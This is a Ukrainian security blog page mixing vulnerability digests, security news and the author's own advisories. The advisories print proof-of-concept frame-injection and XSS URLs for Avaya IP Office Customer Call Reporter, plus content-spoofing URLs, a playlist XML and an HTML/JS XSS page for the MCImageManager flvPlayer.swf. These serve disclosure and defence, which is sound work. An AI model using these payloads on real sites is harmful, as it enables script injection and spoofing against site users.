Websecurity - Веб безпека

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird та Seamonkey.

Уразливі продукти: Mozilla Firefox 22.0, Firefox ESR 17.0, Thunderbird 17.0, Thunderbird ESR 17.0, Seamonkey 2.19.

Пошкодження пам’яті, переповнення буфера, міжсайтовий доступ до даних, підміна інформації, міжсайтовий скриптінг, підвищення привілеїв, обхід захисту, DoS, виконання коду, витік інформації.

• Mozilla Foundation Security Advisory 2013-63 (деталі)
• Mozilla Foundation Security Advisory 2013-64 (деталі)
• Mozilla Foundation Security Advisory 2013-65 (деталі)
• Mozilla Foundation Security Advisory 2013-66 (деталі)
• Mozilla Foundation Security Advisory 2013-67 (деталі)
• Mozilla Foundation Security Advisory 2013-68 (деталі)
• Mozilla Foundation Security Advisory 2013-69 (деталі)
• Mozilla Foundation Security Advisory 2013-70 (деталі)
• Mozilla Foundation Security Advisory 2013-71 (деталі)
• Mozilla Foundation Security Advisory 2013-72 (деталі)
• Mozilla Foundation Security Advisory 2013-73 (деталі)
• Mozilla Foundation Security Advisory 2013-74 (деталі)
• Mozilla Foundation Security Advisory 2013-75 (деталі)

В даній добірці уразливості в веб додатках:

• FOSCAM IP-Cameras Improper Access Restrictions (деталі)
• Multiple CSRF vulnerabilities on Foscam IP cameras web UI (деталі)
• Multiple Vulnerabilities in Exponent CMS (деталі)
• Vulnerabilities in otrs (деталі)
• Multiple Vulnerabilities in OpenX (деталі)

У грудні, 06.12.2012, я знайшов Remote HTML Include та Remote XSS Include (Cross-Site Scripting) уразливості в Avaya IP Office Customer Call Reporter. Про що вже повідомив розробникам.

Спочатку я ще у грудні й січні повідомив ZDI про інші критичні уразливості в цьому продукті Avaya (про них я напишу пізніше, зараз наведу ці дірки). ZDI повільно відповідали і лише робили вигляд, що вони займаються цим питанням, лише у серпні активно взялися за справу, зв’язалися з Avaya, але ті не відповіли, тому ZDI відмовилися займатися цією справою. А у липні я повідомив розробникам (про ці дірки та інші критичні уразливості), але вони проігнорували моє повідомлення.

RHI (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

RXI (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

Вразливі Avaya IP Office Customer Call Reporter 8.0.9.13, 9.0.0.0 та попередні версії. Торік я перевірив у версії 8.0.9.13, а сьогодні в останній версії 9.0.0.0.

У червні, 18.06.2013, майже через місяць після виходу Google Chrome 27, вийшов Google Chrome 28.

В браузері зроблено декілька нововведень та виправлені помилки. Та збільшені мінімальні вимоги до Linux-систем.

А також виправлено 19 уразливостей, деякі з яких позначені як небезпечні. Це більше ніж у попередній версії браузера.

З виправлених проблем безпеки відзначаються проблеми звертання до вже звільнених блоків пам’яті (Use-after-free), обхід SOP при обробці фреймів, плутанина типів у движку v8 та інші уразливості.

• Релиз web-браузера Chrome 28 с повышением минимальных требований к Linux-системам (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://masterdrev.com.ua - інфекція була виявлена 17.07.2013. Зараз сайт входить до переліку підозрілих.
• http://kievboard.com - інфекція була виявлена 03.07.2013. Зараз сайт не входить до переліку підозрілих.
• http://basic.at.ua - інфекція була виявлена 29.06.2013. Зараз сайт входить до переліку підозрілих.
• http://mycounter.ua - інфекція була виявлена 15.08.2013. Зараз сайт не входить до переліку підозрілих.
• http://mycounter.com.ua - інфекція була виявлена 18.07.2013. Зараз сайт не входить до переліку підозрілих.

В даній добірці експлоіти в веб додатках:

• Apache suEXEC Privilege Elevation / Information Disclosure (деталі)
• Firefox onreadystatechange Event DocumentViewerImpl Use After Free (деталі)
• D-Link Devices Unauthenticated Remote Command Execution Vulnerability (деталі)
• OpenX Backdoor PHP Code Execution Vulnerability (деталі)
• onehttpd 0.7 - Denial of Service Vulnerability (деталі)

Учора я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на http://ebay.com - сайті аукціону eBay (зокрема на https://scgi.ebay.com). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на ebay.com.

Детальна інформація про уразливості з’явиться пізніше.

За повідомленням www.opennet.ru, в OpenX виявлений бекдор.

У коді OpenX, відкритого движка для організації показу онлайн реклами, виявлений бекдор. Наявність бекдора підтверджена у версії 2.8.10, але за заявою дослідників безпеки шкідливий код поставлявся починаючи з листопада 2012 року. Розробники проекту підвердили даний інцидент і радять усім користувачам оновити OpenX до версії 2.8.11.

Про бекдори у веб додатках я вже писав неодноразово і це черговий випадок.

За повідомленням www.xakep.ru, Google підтвердила баг у генераторі псевдовипадкових чисел під Android.

Розробник Алекс Клюбін з компанії Google підтвердив наявність уразливості в криптографічному модулі Java Cryptography Architecture, що використовується додатками Android для генерації ключів, підпису і генерації псевдовипадкових чисел. Уразливість пов’язана з некоректною реалізацією генератора псевдовипадкових чисел (PRNG) в операційній системі.

Він опублікував повідомлення в блозі для розробників Android незабаром після того, як стало відомо про крадіжку як мінімум 55 BTC з одного з біткоін-гаманців, згенерованих у Android-додатку.

За повідомленням bugtraq.ru, Facebook засвітив особисті дані шести мільйонів користувачів за рік.

Помилка в реалізації механізму “Download Your Information” привела до того, що користувач при завантаженні своїх даних міг прихопити й електронну пошту/телефони інших користувачів зі свого списку контактів або тих, з ким він був яким-небудь чином пов’язаний у соціальній мережі.

Витоки ці почалися ще в 2012, але розробники усунули уразливість лише наприкінці червня. Загальне число потерпілих оцінюється в шість мільйонів.

Те, що Facebook дірявий, я писав неодноразово. Витоки інформації та інші уразливості там знаходять увесь час. Сам знаходив багато уразливостей на сайтах цієї соцмережі.

Виявлені уразливості безпеки в Apache suexec.

Уразливі продукти: Apache 2.2.

Підвищення привілеїв, обхід захисту.

• Apache suEXEC privilege elevation / information disclosure (деталі)

11.06.2013

У квітні, 14.04.2013, я знайшов Content Spoofing, Cross-Site Scripting та Full Path Disclosure уразливості в Moxiecode Image Manager (MCImageManager) для TinyMCE. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MCImageManager для TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

16.08.2013

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flvPlayer.swf(з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Full Path Disclosure (WASC-13):

Повний шлях в кукісах MCManager_im_lastPath і MCManagerHistoryCookie_im.

Вразливі Moxiecode Image Manager 3.1.5 та попередні версії.